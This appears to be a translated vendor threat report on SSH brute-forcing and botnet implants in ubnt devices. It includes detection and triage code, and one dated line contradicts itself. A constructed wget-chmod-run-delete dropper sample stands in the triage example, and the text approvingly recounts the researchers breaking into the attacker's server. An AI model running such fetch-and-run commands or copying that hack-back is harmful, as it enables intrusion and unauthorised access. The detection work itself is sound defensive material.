Threat warning: a large number of ubnt devices have been implanted with backdoors
This article describes in detail the whole process: discovering the attack, analyzing the intrusion, gaining access to the attacker's server, obtaining privileges there and collecting evidence. Intrusions of this kind are common, especially attacks that aim at one specific type of system but are carried out as a "blind scan" of the whole network.
Recently, the Anheng security research team detected a large number of brute-force attacks on port 22 (SSH) using weak passwords. After detailed analysis, the security team found that a large number of ubnt devices on the network have weak passwords and that hackers have been implanting backdoors into them with automated tools. The Anheng APT network warning platform successfully detected this attack:
On July 6, March 19, an Anheng engineer received a network fault report from a customer. After contacting the customer, the engineer responded to the emergency remotely and found several suspicious shell processes on the customer's device.
Analysis showed that the main function of these shell scripts is to download and run suspicious files with wget and finally delete the downloaded files, which makes later evidence collection difficult.
We tried to open the malicious page involved:
We can see that:
Suspicious IP 222.*.*.62: the file "10010" was downloaded 9108 times in one day
Suspicious IP 180.*.*.241: the file "hope9" was downloaded 396 times within 48 minutes
Analysis showed that the two suspicious files are DDoS tools built for the MIPS architecture; foreign researchers call this family "Mr. Black".
Its main functions are common DDoS attack methods such as GET_Flood, SYN_Flood and UDP_Flood.
The next day we continued to observe and found that the download count of one of the malicious files had risen from 9108 to 15171.
This many downloads within a single day drew our close attention.
We used technical means to take control of the malicious server. After entering its Remote Desktop, we found that port 8000 on this host had established network connections with many other IP addresses.
We opened several of these IP addresses at random and found that they were all ubnt devices!
While collecting evidence, we found a large number of hacking tools on the desktop.
Coincidentally, the hacker had just logged on to this machine remotely.
We used netstat to find the hacker's IP address.
Malicious IP address found: 139.201.133.104. According to ip138, this IP address is located in "Sichuan".
Later, we used a tool to capture the administrator's password. After logging in with the administrator's account and password, we found that the hacker was running a remote control tool.
The figure shows that the listening port is 8000 and that the number of hosts controlled by the hacker is 564.
Port 8000 is also consistent with what we saw with netstat!
In addition, when we viewed the network connections with TCPView, the machine was still attacking port 9200 on other IP addresses.
Port 9200 is the Elasticsearch port. Because earlier versions of Elasticsearch have a remote command execution vulnerability, the port opened by this service can be exploited by hackers. The PoC is as follows:
Therefore, the hackers also use port 9200 to implant backdoors (Linux-based worms).
The attack on the Elasticsearch server looks as follows:
After collecting the related malicious files, we found that the tool used to implant the ubnt devices is called "linux Command batch execution tool".
The commands used here to implant the malware are the same as the ones we saw on the customer's devices!
The attack process is as follows:
Brute-force port 22 with a weak password; implant the backdoor with a shell command; the hacker then sends commands to the hacked device to launch attacks.
According to the scan results saved by the hackers, a large number of ubnt devices have weak passwords. (The username and password used for the brute-force attack are the factory default credentials of ubnt devices!)
We tried several devices at random and found that they still used the default weak password, and several devices had been repeatedly implanted with worms fetched from different URLs.
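The attack chain above starts with password guessing against SSH, so the earliest place to catch it on a device or a central syslog collector is the sshd authentication log. The following is an added example (not part of the article and not the Anheng platform's own detection logic) that parses OpenSSH-style log lines, flags a source IP once it produces a configurable number of failed logins inside a sliding time window, and then reports any accepted login from an already-flagged IP, which is exactly the "brute-force, then implant" sequence described above. The log lines, the host name `gw`, the IP addresses and the year used to complete the syslog timestamps are all constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in OpenSSH syslog format; not traffic recovered from the incident.
SAMPLE_AUTH_LOG = """\
Mar 19 10:00:01 gw sshd[2001]: Failed password for ubnt from 198.51.100.7 port 40001 ssh2
Mar 19 10:00:02 gw sshd[2002]: Failed password for ubnt from 198.51.100.7 port 40002 ssh2
Mar 19 10:00:03 gw sshd[2003]: Failed password for root from 198.51.100.7 port 40003 ssh2
Mar 19 10:00:04 gw sshd[2004]: Failed password for admin from 198.51.100.7 port 40004 ssh2
Mar 19 10:00:05 gw sshd[2005]: Failed password for ubnt from 198.51.100.7 port 40005 ssh2
Mar 19 10:00:06 gw sshd[2006]: Accepted password for ubnt from 198.51.100.7 port 40006 ssh2
Mar 19 10:05:00 gw sshd[2007]: Failed password for ubnt from 192.0.2.10 port 50001 ssh2
Mar 19 10:30:00 gw sshd[2008]: Accepted publickey for ops from 192.0.2.44 port 60001 ssh2
"""

# Matches both "Failed password for ..." and "Accepted publickey for ...";
# "invalid user" is optional because sshd adds it for unknown account names.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2015):
    """Parse one sshd line into a dict, or return None for unrelated lines.
    Syslog timestamps carry no year, so the caller supplies one (assumed here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return (flagged, compromised).

    flagged:     ip -> time the ip first reached `threshold` failures within `window_s`
    compromised: (ip, user, method, time) for every accepted login from a flagged ip
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    flagged = {}
    compromised = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            # Drop failures that fell out of the sliding window.
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
        elif ip in flagged:
            # A success after a burst of failures is the signature of a guessed password.
            compromised.append((ip, ev["user"], ev["method"], ts))
    return flagged, compromised


def run_sample():
    return detect_bruteforce(SAMPLE_AUTH_LOG.splitlines())


if __name__ == "__main__":
    flagged, compromised = run_sample()
    for ip, ts in flagged.items():
        print(f"brute-force source {ip} flagged at {ts}")
    for ip, user, method, ts in compromised:
        print(f"ACCEPTED {method} login for {user} from flagged {ip} at {ts}")
```

On a real device the input would be the output of `journalctl -u ssh` or the auth log, and the accepted-login events are the ones worth paging on: a flagged IP that never succeeds is noise, while one that succeeds means the default credentials are still in place and the device should be treated as compromised and re-imaged, not just rebooted.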
The following URLs were included in the preliminary statistics:
Malicious URLs change constantly (note: not all of them are included!)
Later analysis found that many of the malicious files use *.f3322.org and *.f3322.net hostnames as the control domains for the malicious services. The registration information of these two domains matches that of pubyu.com (formerly 3322.org). All of them provide free second-level domain name registration, which is why hackers like them!
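Two of the observations above give a responder something concrete to check on a suspect device: the dropper scripts follow a fixed download-run-delete shape (wget, then execute, then rm), and the download and control hosts tend to live under the free f3322.org / f3322.net zones. The following is an added example, not code from the article, that pulls the URLs out of a shell script in that shape, flags hosts under those two zones, and reports which of the three stages the script contains. The sample script, its hostnames and IP address are constructed for the example; the zone list comes from the article, and the regular expressions are assumptions about how such scripts are typically written.

```python
import re
from urllib.parse import urlparse

# Zones the article names as free second-level DNS providers used for C2 hostnames.
FREE_DYNDNS_ZONES = ("f3322.org", "f3322.net")

# Constructed sample with the download-run-delete shape described above;
# the hosts, address and file names are placeholders, not indicators from the incident.
DROPPER_SAMPLE = """\
#!/bin/sh
cd /tmp || cd /var/tmp
wget http://host-a.f3322.org/bin_a -O bin_a
chmod +x bin_a
./bin_a
wget http://198.51.100.20/bin_b -O bin_b && sh bin_b
rm -f bin_a bin_b
"""

URL_RE = re.compile(r"""https?://[^\s'"`;|&]+""")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
# Execution: a ./binary or "sh file" at the start of a command, or a chmod that makes a file executable.
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)(?:\./\S+|sh\s+\S+|chmod\s+(?:\+x|[0-7]{3,4})\s)")
DELETE_RE = re.compile(r"\brm\s+(?:-\S+\s+)*\S")


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_free_dyndns(host):
    """True if host is one of the listed zones or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == z or host.endswith("." + z) for z in FREE_DYNDNS_ZONES)


def triage_script(text):
    """Extract download URLs from a shell script and classify it.

    Returns a dict with the URLs in order of appearance, the hosts that fall under
    the free dynamic-DNS zones, which stages (download/execute/delete) were seen,
    and a boolean that is True only when all three stages are present."""
    urls, dyndns_hosts = [], []
    stages = {"download": False, "execute": False, "delete": False}
    for line in text.splitlines():
        cmd = line.split("#", 1)[0].strip()   # drop shebang and comments
        if not cmd:
            continue
        if DOWNLOAD_RE.search(cmd):
            stages["download"] = True
            for url in URL_RE.findall(cmd):
                urls.append(url)
                host = host_of(url)
                if is_free_dyndns(host) and host not in dyndns_hosts:
                    dyndns_hosts.append(host)
        if EXEC_RE.search(cmd):
            stages["execute"] = True
        if DELETE_RE.search(cmd):
            stages["delete"] = True
    return {"urls": urls, "dyndns_hosts": dyndns_hosts, "stages": stages,
            "dropper_like": all(stages.values())}


if __name__ == "__main__":
    result = triage_script(DROPPER_SAMPLE)
    print("urls:        ", result["urls"])
    print("dyndns hosts:", result["dyndns_hosts"])
    print("stages:      ", result["stages"])
    print("dropper-like:", result["dropper_like"])
```

Because the scripts delete their payloads, the script text and the process list are often the only artefacts left on the device; feeding recovered scripts through a triage like this gives a de-duplicated list of hosts to block at the edge and to look for in DNS logs, which matters here precisely because the article notes the URLs change constantly while the f3322 zones stay the same.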
Anheng's security team once again reminds customers to carry out security awareness education to prevent weak and default passwords of every kind. In addition, with the rapid development of the Internet of Things, personal computers may no longer be the primary targets of intrusion: any device connected to the network can be hacked, and traditional equipment manufacturers should also shoulder the responsibility of protecting their customers' interests!